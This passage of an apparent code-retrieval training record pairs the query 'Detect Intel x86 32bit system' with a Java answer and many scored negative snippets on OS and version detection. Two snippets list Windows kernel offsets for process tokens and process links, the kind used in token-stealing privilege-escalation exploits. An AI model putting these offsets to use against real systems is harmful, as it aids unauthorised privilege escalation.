Must be >= %s and <= %s, \"\r\n \"but running %s.\" % (min_version_str, max_version_str,\r\n version_string))\r\n self.assertTrue(pass_test, error_msg)", "def _check_package_version(package, min_version):\n # Re-raise with a more informative message when the package is not\n # installed\n try:\n module = import_module(package)\n except ModuleNotFoundError:\n raise ModuleNotFoundError(\"Please install {0} with a version >= \"\n \"{1} in order to install scikit-lr.\"\n .format(package, min_version))\n\n if LooseVersion(module.__version__) < min_version:\n raise ValueError(\"The current version of {0} is {1} installed in {2}.\"\n .format(package, module.__version__, module.__path__))", "def osversion():\n return platform()", "def parse_version_major(bin_path):\n version = parse_version(bin_path)\n return int(version.split(\".\")[0]) if version else None", "def semantic_version(value):\n try:\n semantic_version_module.Version(value)\n return True\n except ValueError:\n return False", "def check_for_updates(package_name, latest_version_str, our_version_str=VERSION):\n our = dict()\n latest = dict()\n for version, suffix in ((our, our_version_str), (latest, latest_version_str)):\n for part in ['major', 'minor', 'patch']:\n version[part], _, suffix = suffix.partition('.')\n version[part] = int(version[part])\n version['suffix'] = suffix\n\n for part in ['major', 'minor', 'patch', 'suffix']:\n if latest[part] > our[part]:\n if part == 'major':\n sys.exit(messages['UpdateRequired'].format(package_name))\n else:\n print >> sys.stderr, messages['UpdateAvailable'].format(package_name)\n return", "def _get_valid_version(number: str) -> int:\n version = int(number)\n if version >= 0:\n return version\n raise ValueError(\"Each number version must be positive!\")", "def test_get_ucs_version(self):\n ver = self.u.get_ucs_version()\n self.assertTrue(isinstance(ver, basestring))\n self.assertEqual('3.0-1', ver)", "def check_os_version():\n if not version.is_supported_version():\n supported_releases = []\n for rel in version.SUPPORTED_VERSIONS:\n for ver in version.SUPPORTED_VERSIONS[rel]:\n supported_releases.append(rel.upper() + ' ' + ver)\n reporting.create_report([\n reporting.Title(\n 'The installed OS version is not supported for the in-place upgrade to the target RHEL version'\n ),\n reporting.Summary(\n 'The supported OS releases for the upgrade process:\\n'\n ' {}'.format('\\n'.join(supported_releases))\n ),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS),\n reporting.Groups([reporting.Groups.INHIBITOR]),\n # we want to set a static Key here because of different Title per path\n reporting.Key('1c7a98849a747ec9890f04bf4321de7280970715')\n ] + related)", "def installedVersion():\n\n cmd = f'{dcm2niix()} -h'\n versionPattern = re.compile(r'v'\n r'(?P<major>[0-9]+)\\.'\n r'(?P<minor>[0-9]+)\\.'\n r'(?P<year>[0-9]{4})'\n r'(?P<month>[0-9]{2})'\n r'(?P<day>[0-9]{2})')\n\n try:\n output = sp.check_output(cmd.split()).decode()\n output = [l for l in output.split('\\n') if 'version' in l.lower()]\n output = '\\n'.join(output).split()\n\n for word in output:\n\n match = re.match(versionPattern, word)\n\n if match is not None:\n return (int(match.group('major')),\n int(match.group('minor')),\n int(match.group('year')),\n int(match.group('month')),\n int(match.group('day')))\n\n except Exception as e:\n log.debug(f'Error parsing dcm2niix version string: {e}')\n return None", "def test_python_supported_version(self):\r\n min_acceptable_version = (2, 7, 0)\r\n 
min_unacceptable_version = (3, 0, 0)\r\n\r\n command = 'python --version'\r\n proc = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT)\r\n stdout = proc.stdout.read()\r\n\r\n version_str_matches = re.findall('Python\\s+(\\S+)\\s*', stdout.strip())\r\n self.assertEqual(len(version_str_matches), 1,\r\n \"Could not determine the Python version in '%s'.\" %\r\n stdout)\r\n version_string = version_str_matches[0]\r\n\r\n try:\r\n if version_string[-1] == '+':\r\n version_string = version_string[:-1]\r\n version = tuple(map(int, version_string.split('.')))\r\n if len(version) == 2:\r\n version = (version[0], version[1], 0)\r\n pass_test = (version >= min_acceptable_version and\r\n version < min_unacceptable_version)\r\n except ValueError:\r\n pass_test = False\r\n version_string = stdout\r\n self.assertTrue(pass_test,\r\n \"Unsupported Python version. Must be >= %s and < %s, \"\r\n \"but running %s.\"\r\n % ('.'.join(map(str, min_acceptable_version)),\r\n '.'.join(map(str, min_unacceptable_version)),\r\n version_string))", "def check_openhpiver(reqver_text):\n\treturn check_pkgcfg_ver(reqver_text, 'openhpi')", "def _parse_version(version):\n return version.split(\".\")[0]", "def is_osx():\n return sys.platform == \"darwin\"", "def guessNSVersion( elfPath, linkName, defaultVersion ):\n\n # Guess 1\n cmdLine = [ elfPath, \"-version\",\n \"|\", grep, \"Package:\" ]\n line = safeRun( cmdLine ).strip()\n if line != \"\":\n # e.g.: Package: netschedule 4.8.1, build Jun 7 2011 16:07:33\n line = line.split( ',' )[ 0 ].replace( 'Package: netschedule ', \"\" )\n if line != '0.0.0':\n if isVersionFormat( line ):\n return line\n\n # Guess 2\n line = os.path.basename( linkName )\n if isVersionFormat( line ):\n return line\n\n return defaultVersion", "def require_version(version):\n def check_require_version(f):\n version_elements = version.split('.')\n try:\n compare = tuple([int(v) for v in version_elements])\n except ValueError:\n raise ValueError('%s is not a correct version : should be X.Y[.Z].' % version)\n current = sys.version_info[:3]\n if current < compare:\n def new_f(self, *args, **kwargs):\n self.skipTest('Need at least %s version of python. Current version is %s.' % (version, '.'.join([str(element) for element in current])))\n new_f.__name__ = f.__name__\n return new_f\n else:\n return f\n return check_require_version", "def version():\n cmd = \"{} -v\".format(_detect_os())\n out = __salt__[\"cmd.run\"](cmd).splitlines()\n ret = out[0].split(\": \")\n return ret[1]", "def is_osx():\r\n return sys.platform == \"darwin\"", "def parse_compute_version(compute_version):\n split_ver = compute_version.split(\".\")\n try:\n major = int(split_ver[0])\n minor = int(split_ver[1])\n return major, minor\n except (IndexError, ValueError) as err:\n # pylint: disable=raise-missing-from\n raise RuntimeError(\"Compute version parsing error: \" + str(err))", "def checkVersion(version):\n libxml2mod.xmlCheckVersion(version)" ]
[ "0.6574004", "0.6253473", "0.6247122", "0.6238033", "0.6165214", "0.6156912", "0.612077", "0.60846204", "0.60516804", "0.6008613", "0.5996625", "0.5967177", "0.59521145", "0.59322596", "0.5885311", "0.5882469", "0.58820486", "0.5845207", "0.5835244", "0.5812287", "0.580141", "0.5753324", "0.5741814", "0.57388365", "0.5727548", "0.5719305", "0.5712523", "0.570974", "0.5707202", "0.56917536", "0.56886", "0.5681082", "0.567781", "0.56752706", "0.5669042", "0.56520915", "0.563045", "0.56144625", "0.5608853", "0.56012267", "0.5595813", "0.5594198", "0.55610126", "0.5554938", "0.55531675", "0.555052", "0.5536245", "0.5531941", "0.55185723", "0.550402", "0.550306", "0.54941756", "0.5482692", "0.5473175", "0.54664034", "0.54502594", "0.5433305", "0.5428296", "0.54251426", "0.54243875", "0.54180247", "0.5411779", "0.5403252", "0.54024285", "0.53984666", "0.53982735", "0.53982705", "0.53831863", "0.5376291", "0.5376133", "0.5367487", "0.53663164", "0.53526837", "0.5350293", "0.53497815", "0.5331338", "0.5327808", "0.53268427", "0.53252304", "0.5319384", "0.53179497", "0.5303032", "0.53007823", "0.5298958", "0.52976817", "0.5286069", "0.5283271", "0.52830714", "0.5282459", "0.5280961", "0.5279745", "0.5279075", "0.5278545", "0.5277735", "0.5274737", "0.5272376", "0.52643603", "0.52623206", "0.52616286", "0.5261231" ]
0.62811625
1
Detect Intel x86 32bit system
def isIntelX86_32bit(): return String(System.getProperty("os.arch", "null").strip()).toLowerCase(Locale.ROOT) == "x86"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_32bit(self):\n return self.machine in ['i386', 'i586', 'i686']", "def osarch_is_32_bit():\n return osarch_match(\"32-bit\")", "def osarch_is_ia32():\n return osarch_match(\"ia32\")", "def host_arch_win():\n\n arch = os.environ.get('PROCESSOR_ARCHITECTURE', 'x86')\n\n matchup = {\n 'AMD64' : 'x64',\n 'x86' : 'ia32',\n 'arm' : 'arm',\n }\n\n return matchup.get(arch, 'ia32')", "def host_arch_win():\n\n arch = os.environ.get('PROCESSOR_ARCHITECTURE', 'x86')\n\n matchup = {\n 'AMD64': 'x64',\n 'x86': 'ia32',\n 'arm': 'arm',\n }\n\n return matchup.get(arch, 'ia32')", "def is_64_windows():\n return 'PROGRAMFILES(X86)' in os.environ", "def is_64_windows(self):\n return 'PROGRAMFILES(X86)' in os.environ", "def get_os_name(x86=0):\r\n platform_in_short, on_win = sys.platform[:3], 0\r\n\r\n if platform_in_short == \"win\":\r\n on_win = 1\r\n os_name = \"nt\"\r\n elif platform_in_short == \"lin\":\r\n os_name = \"lin\"\r\n else:\r\n os_name = \"sol\"\r\n if not x86:\r\n os_name += \"64\"\r\n return on_win, os_name", "def get_os_name(x86=0):\r\n platform_in_short, on_win = sys.platform[:3], 0\r\n\r\n if platform_in_short == \"win\":\r\n on_win = 1\r\n os_name = \"nt\"\r\n elif platform_in_short == \"lin\":\r\n os_name = \"lin\"\r\n else:\r\n os_name = \"sol\"\r\n if not x86:\r\n os_name += \"64\"\r\n return on_win, os_name", "def host_arch_cc():\n\n k = cc_macros()\n\n matchup = {\n '__x86_64__' : 'x64',\n '__i386__' : 'ia32',\n '__arm__' : 'arm',\n }\n\n rtn = 'ia32' # default\n\n for i in matchup:\n if i in k and k[i] != '0':\n rtn = matchup[i]\n break\n\n return rtn", "def bitness():\n # see https://docs.python.org/2/library/platform.html#platform.architecture\n return '64-bit' if sys.maxsize > 2**32 else '32-bit'", "def osarch_is_amd64():\n return osarch_match(\"amd64\")", "def host_arch_cc():\n\n k = cc_macros()\n\n matchup = {\n '__x86_64__': 'x64',\n '__i386__': 'ia32',\n '__arm__': 'arm',\n }\n\n rtn = 'ia32' # default\n\n for i in matchup:\n if i in k and k[i] != '0':\n rtn = matchup[i]\n break\n\n return rtn", "def architecture(self):\n return self.random.choice([\n 'x86_64', \n 'x86'\n ])", "def is_64bit(self):\n return self.machine == 'x86_64'", "def test_cpu_architecture_value(self):\n \n cpu_architecture = get_cpu_information()[0]\n \n # Check to make sure the returned value is \"x86_64\"\n self.assertEqual(cpu_architecture, 'x86_64')", "def osarch_is_64_bit():\n return osarch_match(\"64-bit\")", "def usefulFunction():\n print(platform.uname()) # Yay it told me about my computer - no idea what it means but thats cool", "def on_powerpc():\n return processor() == 'powerpc' or machine().startswith('ppc')", "def is_vserver_kernel():\n\n kinfo = commands.getoutput('/bin/uname -a').split()[2]\n return '-vs' in kinfo", "def architecture():\n if is_darwin:\n # Darwin's platform.architecture() is buggy and always\n # returns \"64bit\" event for the 32bit version of Python's\n # universal binary. 
So we roll out our own (that works\n # on Darwin).\n if sys.maxsize > 2 ** 32:\n return '64bit'\n else:\n return '32bit'\n else:\n return platform.architecture()[0]", "def usefulFunction():\n print(platform.uname()) #displayed this computer's specifications", "def setosvariablesx86():\n\tKPROCESS = ''\n\tAPLINKS = ''\n\tUPID = ''\n\tTOKEN = ''\n\tversion = sys.getwindowsversion()\n\n\tif((version.major == 5) and (version.minor == 1) and ('3' in version.service_pack)):\n\t\t# the target machine's OS is Windows XP SP3\n\t\tprint \"[*] OS version: Windows XP SP3\"\n\t\tKPROCESS = '\\x44'\n\t\tTOKEN\t= '\\xC8'\n\t\tUPID\t = '\\x84'\n\t\tAPLINKS = '\\x88'\n \n\telif((version.major == 5) and (version.minor == 2) and ('2' in version.service_pack)):\n\t\t# the target machine's OS is Windows Server 2003 SP2\n\t\tprint \"[*] OS version: Windows Server 2003 SP2\"\n\t\tKPROCESS = '\\x38'\n\t\tTOKEN\t= '\\xD8'\n\t\tUPID\t = '\\x94'\n\t\tAPLINKS = '\\x98'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type == VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Vista SP1 / SP2\n\t\tprint \"[*] OS version: Windows Vista SP1 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type != VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Server 2008 / SP2\n\t\tprint \"[*] OS version: Windows Server 2008 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 1)):\n\t\t# the target machine's OS is Windows 7 / SP1\n\t\tprint \"[*] OS version: Windows 7 / SP1\"\n\t\tKPROCESS = '\\x50'\n\t\tTOKEN\t= '\\xF8'\n\t\tUPID\t = '\\xB4'\n\t\tAPLINKS = '\\xB8'\n\t\n\telse:\n\t\tprint \"[-] No matching OS version, exiting...\"\n\t\tsys.exit(-1)\n\t\n\treturn (KPROCESS,APLINKS,UPID,TOKEN)", "def is64bit(self):\n return platform.machine().endswith('64')", "def is_64bit():\n is64bit = sys.maxsize > 2 ** 32\n if sys.platform == \"cli\":\n is64bit = sys.executable.endswith(\"ipy64.exe\")\n return is64bit", "def get_arch():\n arch = platform.machine()\n if arch == \"i686\":\n return \"i686\"\n elif arch == \"x86_64\":\n return \"x86_64\"\n elif arch == \"aarch64\":\n return \"aarch64\"\n else:\n return \"unknown\"", "def get_platform_architecture() -> None:\n global _PLATFORM, _ARCHITECTURE, _COMPRESSION\n\n x86_64 = {\"x86_64\", \"amd64\", \"AMD64\", \"64bit\"}\n i386 = {\"i386\", \"i486\", \"i586\", \"i686\", \"386\", \"x86\", \"32bit\"}\n\n system = platform.system()\n if system == \"Windows\":\n machine = platform.machine()\n else:\n machine = os.uname().machine\n\n if system == \"Linux\":\n _PLATFORM = \"linux\"\n if machine in x86_64:\n _ARCHITECTURE = \"64\"\n elif machine in i386:\n _ARCHITECTURE = \"32\"\n else:\n _ARCHITECTURE = \"other\"\n\n elif system in {\"OpenBSD\", \"NetBSD\", \"FreeBSD\"}:\n _PLATFORM = \"bsd\"\n _ARCHITECTURE = \"other\"\n if system == \"FreeBSD\":\n if machine in x86_64:\n if detect_freebsd_linux_compatibility(\"64\"):\n _PLATFORM = \"linux\"\n _ARCHITECTURE = \"64\"\n elif machine in i386:\n if detect_freebsd_linux_compatibility(\"32\"):\n _PLATFORM = \"linux\"\n _ARCHITECTURE = \"32\"\n\n elif system in {\"Haiku\", \"Hurd\"}:\n _PLATFORM = \"linux\"\n _ARCHITECTURE = \"other\"\n\n elif system 
== \"Darwin\":\n _PLATFORM = \"mac\"\n _ARCHITECTURE = \"os\"\n elif system == \"Windows\":\n _PLATFORM = \"win\"\n if machine in x86_64:\n _ARCHITECTURE = \"64\"\n elif machine in i386:\n _ARCHITECTURE = \"32\"\n if not all([_PLATFORM, _ARCHITECTURE]):\n raise PlatformError(f\"Failed to detect appropriate platform. {system} {machine}\")\n\n if _PLATFORM == \"win\":\n _COMPRESSION = \"zip\"\n else:\n _COMPRESSION = \"tar.gz\"", "def isOnNao():\n szCpuInfo = \"/proc/cpuinfo\";\n if not os.path.exists( szCpuInfo ): # already done by the getFileContents\n return False;\n szAllFile = getFileContents( szCpuInfo, bQuiet = True );\n if( szAllFile.find( \"Geode\" ) == -1 and szAllFile.find( \"Intel(R) Atom(TM)\" ) == -1 ):\n return False;\n return True;", "def test_os_processor(self):\n self.assertEqual(self.settings.OS_PROCESSOR, platform.processor())", "def processor():\n return uname().processor", "def processor():\n return uname().processor", "def test_wrong_architecture(tmp_path, host_python, build_python, get_resource):\n\n crossenv = make_crossenv(tmp_path, host_python, build_python,\n '--cc=/usr/bin/gcc')\n for line in crossenv.creation_log.splitlines():\n if re.match(r'WARNING:.*architecture', line):\n return\n assert False, \"Crossenv did not detect wrong architecture\"", "def check_architecture(target_architecture):\n if target_architecture == ARCH_16_BIT:\n # should be fine, most computers are at least 32 bit these days\n pass\n elif target_architecture == ARCH_32_BIT:\n # should be fine, most computers are at least 32 bit these days\n pass\n elif target_architecture == ARCH_64_BIT:\n # needs to be a 64 bit system\n is_64_bit_system = platform.machine().endswith(\"64\")\n if not is_64_bit_system:\n log_error(\"you are unable to analyze a 64-bit binary on a non-64-bit system\")\n else:\n log_error(f\"something is strange with the architecture type '{target_architecture}'\")", "def is_64_windows():\n return struct.calcsize('P') * 8 == 64", "def is64Bit(program: ghidra.program.model.listing.Program) -> bool:\n ...", "def get_current_kernel_arch():\r\n try:\r\n return os.popen('uname -m').read().rstrip()\r\n except:\r\n logging.info(\"Not Found\")\r\n return -1", "def setosvariablesx64():\n\tKPROCESS = ''\n\tFLINK = ''\n\tUPID = ''\n\tTOKEN = ''\n\tversion = sys.getwindowsversion()\n\tif((version.major == 5) and (version.minor == 2)):\n\t\t# the target machine's OS is Windows Server 2003\n\t\tprint \"[*] OS version: Windows Server 2003\"\n\t\tKPROCESS = '\\x68'\n\t\tTOKEN\t= '\\x60\\x01' #0x160\n\t\tUPID\t = '\\xd8\\x00'\n\t\tFLINK = '\\xe0\\x00'\n\telif((version.major == 6) and (version.minor == 1) and ('1' in version.service_pack)):\n\t\t# the target machine's OS is Windows 7x64 SP1\n\t\t#tbd\n\t\tprint \"[*] OS version: Windows 7x64 SP1\"\n\t\tKPROCESS = '\\x70'\n\t\tTOKEN\t= '\\x08\\x02' #0x208\n\t\tUPID\t = '\\x80\\x01' #180\n\t\tFLINK = '\\x88\\x01' #188\n\telse:\n\t\tprint \"[-] No matching OS version, exiting...\"\n\t\tsys.exit(-1)\n\t\t\n\treturn (KPROCESS,FLINK,UPID,TOKEN)", "def _on_windows() -> bool:\n return os.name == \"nt\"", "def is_system(self) -> bool:", "def is_jetson():\n # TODO: check x86_64 explicitly instead in case somebody tries\n # to run this in mips or ppc or something\n # TODO: do further checking if aarch64 to determine whether in fact\n # a tegra system, and if so, which one\n return True if platform.processor() == 'aarch64' else False", "def identify_system() -> str:\n system = platform.system()\n if system not in [\"Linux\", \"Darwin\"]:\n raise 
ValueError(f\"Unsupported system {system}\")\n return system", "def machine():\n mach = platform.machine()\n if mach.startswith('arm'):\n return 'arm'\n else:\n # Assume x86/x86_64 machine.\n return None", "def find_current_arch():\n \n filetype = idaapi.get_file_type_name()\n \n if '386' in filetype:\n print 'Architecture: 32-bit intel.'\n return (ir.IR_INTEL_x86, ir.intel.ir_intel_x86, intel.disassembler)\n elif 'x86-64' in filetype:\n print 'Architecture: 64-bit intel.'\n return (ir.IR_INTEL_x64, ir.intel.ir_intel_x64, intel.disassembler)\n \n raise RuntimeError(\"Don't know which arch to choose for %s\" % (repr(filetype), ))", "def get_arch():\n with settings(hide('running', 'stdout')):\n arch = run('uname -m')\n return arch", "def has_intel_os(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def check_platform():\n system = platform.system()\n distro = platform.platform()\n is_raspberry_pi = False\n try:\n info = open(\"/proc/cpuinfo\").read()\n except FileNotFoundError:\n is_raspberry_pi = False\n else:\n # bcm2708: Raspberry Pi 1\n # bcm2709: Raspberry Pi 2\n # bcm2710: Raspberry Pi 3\n is_raspberry_pi = 'BCM27' in info or 'ODROID' in info\n\n return system == \"Linux\" and (\n os.path.isfile('/proc/device-tree/hat/uuid') or\n 'boot2docker' in distro.lower() or\n is_raspberry_pi or\n os.path.isfile('/sys/hypervisor/uuid') or\n os.path.isdir('/var/lib/digitalocean')\n )", "def win():\n if platform.system() in WINDOWS:\n return True\n return False", "def is_windows():\n return sys.platform == \"win32\"", "def mac_gcc_architecture():\n # Darwin's platform.architecture() is buggy and always\n # returns \"64bit\" event for the 32bit version of Python's\n # universal binary. So we roll out our own (that works\n # on Darwin).\n if sys.maxint > 2L ** 32:\n # 64bit\n return 'x86_64'\n else:\n # 32bit\n return 'i386'", "def test_system_platform():\n accepted_values = ['windows', 'linux']\n output = sh.system_platform()\n assert output in accepted_values", "def sanitize(info):\n if \"processor\" in info and info[\"processor\"] == \"universal-x86-x86_64\":\n # If we're running on OS X 10.6 or newer, assume 64-bit\n if release[:4] >= \"10.6\": # Note this is a string comparison\n info[\"processor\"] = \"x86_64\"\n info[\"bits\"] = 64\n else:\n info[\"processor\"] = \"x86\"\n info[\"bits\"] = 32", "def is_win():\n return sys.platform[:3] == \"win\"", "def is_vrpd():\n cpu_type = platform.machine()\n\n if cpu_type in ['i686', 'i386', 'x86_64', 'armv7l']:\n return True\n\n return False", "def kern():\n return platform.uname()", "def architecture(executable=None, bits='', linkage=''): ###\n # Use the sizeof(pointer) as default number of bits if nothing\n # else is given as default.\n if not bits:\n import struct\n try:\n size = struct.calcsize('P')\n except ValueError: ###\n # Older installations can only query longs\n size = struct.calcsize('l')\n bits = str(size*8) + 'bit'\n\n return bits, linkage", "def known_os_type():\n return 'Linux'", "def usefulFunction():\n# I think the uname platform is a func. 
for findout out the information of the computer\n print(platform.uname())", "def is_windows():\r\n return sys.platform == \"win32\"", "def is_windows():\n return os.name == \"nt\"", "def architecture(cls):\n\n bits, _ = platform.architecture()\n machine = platform.machine()\n\n # Check for ARM machine\n if bits == '32bit' and machine.startswith('armv'):\n return cls.arm(machine)\n\n # Check (bits, machine) map\n machine_key = (bits, machine)\n\n if machine_key in MACHINE_MAP:\n return MACHINE_MAP[machine_key]\n\n # Check (bits) map\n if bits in BITS_MAP:\n return BITS_MAP[bits]\n\n log.error('Unable to determine system architecture - bits: %r, machine: %r', bits, machine)\n return None", "def msan_supported(goroot: GoRoot) -> bool:\n if goroot.goos == \"linux\":\n return goroot.goarch in (\"amd64\", \"arm64\")\n elif goroot.goos == \"freebsd\":\n return goroot.goarch == \"amd64\"\n else:\n return False", "def os_is_windows():\n return platform.system() == \"Windows\"", "def _in_wsl():\n return \"microsoft-standard\" in uname().release", "def local_info():\n local('uname -a')", "def init_linuxArch(self):\n archDic = {'i386': 'i386', 'i686': 'i386', 'i586': 'i386', 'amd64': 'x86_64', 'x86_64': 'x86_64',\n 'i86pc': 'x86_64'}\n result, resultErr = self.ksp_ssh.ssh_execute_command('uname -m')\n #self.logger.info(\"arch info %s\" % (result.strip()))\n self.realArch = result.strip()\n linuxArch = archDic.get(result.strip(), \"unknownArch\") # 判断计算机是多少位\n #self.logger.info(\"linux arch info %s\" % linuxArch)\n return linuxArch", "def matchDLLArch(filename):\n # TODO: check machine type on other platforms?\n if not is_win:\n return True\n\n global _exe_machine_type\n try:\n if _exe_machine_type is None:\n pefilename = sys.executable # for exception handling\n exe_pe = pefile.PE(sys.executable, fast_load=True)\n _exe_machine_type = exe_pe.FILE_HEADER.Machine\n exe_pe.close()\n\n pefilename = filename # for exception handling\n pe = pefile.PE(filename, fast_load=True)\n match_arch = pe.FILE_HEADER.Machine == _exe_machine_type\n pe.close()\n except pefile.PEFormatError as exc:\n raise SystemExit('Can not get architecture from file: %s\\n'\n ' Reason: %s' % (pefilename, exc))\n return match_arch", "def is_windows():\n if os.name == \"nt\":\n return True\n return False", "def systemversionstr():\n return platform.uname().system", "def is_low_core_system(ihost, dba):\n cpu_list = dba.icpu_get_by_ihost(ihost['uuid'])\n number_physical_cores = 0\n for cpu in cpu_list:\n if int(cpu['thread']) == 0:\n number_physical_cores += 1\n return number_physical_cores <= constants.NUMBER_CORES_XEOND", "def is_linux():\r\n return sys.platform.startswith('linux')", "def is_linux():\n (sysname, nodename, release, version, machine) = os.uname()\n return sysname == 'Linux'", "def is_linux():\n return sys.platform[:5] == \"linux\"", "def test_cpu_architecture_type(self):\n \n cpu_architecture = get_cpu_information()[0]\n \n # Check to make sure the returned value is a string\n self.assertEqual(type(cpu_architecture), str)", "def get_system():\n if 'google.colab' in sys.modules:\n return Constant.SYS_GOOGLE_COLAB\n if os.name == 'posix':\n return Constant.SYS_LINUX\n if os.name == 'nt':\n return Constant.SYS_WINDOWS\n\n raise EnvironmentError('Unsupported environment')", "def this_host():\n host_os = platform.system()\n print('This platform OS is: ', host_os)\n return", "def guess_is_sys_id(value):\n return re.match(r'^[A-Za-z0-9]{32}$', value) is not None", "def getplatform():\n\n # Return the system platform\n return 
sys.platform", "def detect_backend():\n try:\n from termpixels.unix import UnixBackend\n return UnixBackend()\n except:\n try:\n from termpixels.win32_vt import Win32VtBackend\n return Win32VtBackend()\n except Exception as e:\n raise e\n from termpixels.win32 import Win32Backend\n return Win32Backend()", "def platform():\n return ['linux']", "def get_system_information(self):\n\t\tsys = platform.uname()\n\t\treturn {\n\t\t\t'hostname': sys.node,\n\t\t\t'operating_system': sys.system,\n\t\t\t'version': sys.version,\n\t\t\t'release': sys.release,\n\t\t\t'processor' : sys.processor,\n\t\t\t'processor_type': sys.machine,\n\t\t}", "def is_system(self) -> undefined.UndefinedOr[bool]:", "def has32bit_linux(self, has32bit_linux):\n\n self._has32bit_linux = has32bit_linux", "def is_windows() -> bool:\n\n return sys.platform == 'win32'", "def is_32_bit_int_compatible( i ) :\r\n\r\n #\r\n # can we convert the input to an integer value ? \r\n #\r\n\r\n try : \r\n\r\n ## debug:\r\n ## print \"compat: \", i, truncate_pyint_to_i32_interval(i)\r\n\r\n if i == truncate_pyint_to_i32_interval( i ) : \r\n ## # debug \r\n ## print \"compat: TRUE\", i, truncate_pyint_to_i32_interval(i)\r\n return True\r\n\r\n except :\r\n\r\n ## # debug : \r\n ## print \"compat: FALSE\", i, truncate_pyint_to_i32_interval(i)\r\n pass\r\n \r\n # else ... \r\n return False", "def is_64bit(self):\n pass", "def test_amd64(self):\n self.do_test(\"2lwp_process_SIGSEGV.amd64\", pid=665, region_count=24)", "def should_i_even_bother(file_bytes):\n if file_bytes[E_MAG[0]:E_MAG[1]] == (str(0x7f) + \"ELF\"):\n if file_bytes[E_BIT[0]] == 1:\n if file_bytes[E_END[0]] == 1:\n return True #this is a 32-bit little-endian ELF file\n return False #this is not a 32-bit little-endian ELF file", "def on_windows ():\n if bjam.variable(\"NT\"):\n return True\n\n elif bjam.variable(\"UNIX\"):\n\n uname = bjam.variable(\"JAMUNAME\")\n if uname and uname[0].startswith(\"CYGWIN\"):\n return True\n\n return False", "def incompatible_architecture(self) -> bool:\n return pulumi.get(self, \"incompatible_architecture\")", "def is_x64_syscall(self, mnemonic):\n return mnemonic == 'syscall'", "def test_amd64(self):\n self.do_test(\"1lwp_SIGSEGV.amd64\", pid=693, region_count=21)", "def osversion():\n return platform()", "def UsableWindowsBinary(entity_type,entity_ids_arr):\n\tif not UsableWindows(entity_type,entity_ids_arr):\n\t\treturn False\n\tfulFileName = entity_ids_arr[0]\n\tif os.path.isdir(fulFileName):\n\t\treturn False\n\tfilename, file_extension = os.path.splitext(fulFileName)\n\t# TODO: Must add library type for ELF and PE ?\n\treturn file_extension.upper() in [\".EXE\", \".DLL\", \".COM\", \".OCX\", \".SYS\", \".ACM\", \".BPL\", \".DPL\"]", "def GetPlatform(self):\n arch = \"None\"\n # check architecture name\n if \"CMTCONFIG\" in os.environ:\n arch = os.environ[\"CMTCONFIG\"]\n elif \"SCRAM_ARCH\" in os.environ:\n arch = os.environ[\"SCRAM_ARCH\"]\n return arch", "def is_windows() -> bool:\n return sys.platform == \"win32\"", "def get_nt_platform_vars ():\n platform = util.get_platform()\n if platform == \"win-amd64\":\n # the Visual C++ runtime files are installed in the x86 directory\n progvar = \"%ProgramFiles(x86)%\"\n architecture = \"amd64\"\n elif platform == \"win32\":\n progvar = \"%ProgramFiles%\"\n architecture = \"x86\"\n else:\n raise ValueError(\"Unsupported platform %r\" % platform)\n return os.path.expandvars(progvar), architecture", "def platform_supported(self):\n return platform.system().lower() in self.platforms if self.platforms 
else False", "def _os_supported(self, plugin):\r\n return sys.platform in plugin.plugin_object.get_supported_os()", "def sanity_check_step(self):\n\n binprefix = \"bin/intel64\"\n libprefix = \"lib/intel64/lib\"\n if LooseVersion(self.version) >= LooseVersion(\"2011\"):\n if LooseVersion(self.version) <= LooseVersion(\"2011.3.174\"):\n binprefix = \"bin\"\n elif LooseVersion(self.version) >= LooseVersion(\"2013_sp1\"):\n binprefix = \"bin\"\n libprefix = \"lib/intel64/lib\"\n else:\n libprefix = \"compiler/lib/intel64/lib\"\n\n custom_paths = {\n 'files': [\"%s/%s\" % (binprefix, x) for x in [\"icc\", \"icpc\", \"idb\"]] +\n [\"%s%s\" % (libprefix, x) for x in [\"iomp5.a\", \"iomp5.so\"]],\n 'dirs': [],\n }\n\n super(EB_icc, self).sanity_check_step(custom_paths=custom_paths)", "def race_detector_supported(goroot: GoRoot) -> bool:\n if goroot.goos == \"linux\":\n return goroot.goarch in (\"amd64\", \"ppc64le\", \"arm64\", \"s390x\")\n elif goroot.goos == \"darwin\":\n return goroot.goarch in (\"amd64\", \"arm64\")\n elif goroot.goos in (\"freebsd\", \"netbsd\", \"openbsd\", \"windows\"):\n return goroot.goarch == \"amd64\"\n else:\n return False" ]
[ "0.81732696", "0.80353045", "0.7400126", "0.6873196", "0.6867948", "0.6770266", "0.6644437", "0.6488959", "0.6488959", "0.6432496", "0.6342804", "0.63230413", "0.6291553", "0.62735385", "0.6245272", "0.615874", "0.6148934", "0.6148358", "0.613531", "0.5986601", "0.5973497", "0.59698814", "0.59559375", "0.59020966", "0.58889675", "0.58845216", "0.58734906", "0.58576053", "0.58499914", "0.5842323", "0.5842323", "0.58060765", "0.5803824", "0.5803136", "0.58011997", "0.5800664", "0.5798221", "0.57915103", "0.5786441", "0.57819176", "0.5765628", "0.5746037", "0.5729667", "0.5717453", "0.56968874", "0.5695253", "0.5680608", "0.5666319", "0.5652716", "0.56469834", "0.5628347", "0.5624756", "0.56194484", "0.56188", "0.5616663", "0.5613204", "0.5607454", "0.56074005", "0.558849", "0.5584226", "0.55543417", "0.55520463", "0.5535836", "0.55185544", "0.5467686", "0.54612994", "0.5454498", "0.54468906", "0.54397243", "0.5431188", "0.54035467", "0.54009295", "0.5397035", "0.5385716", "0.5384243", "0.5367073", "0.5364767", "0.5352294", "0.5351047", "0.53478324", "0.5343768", "0.53392303", "0.5327983", 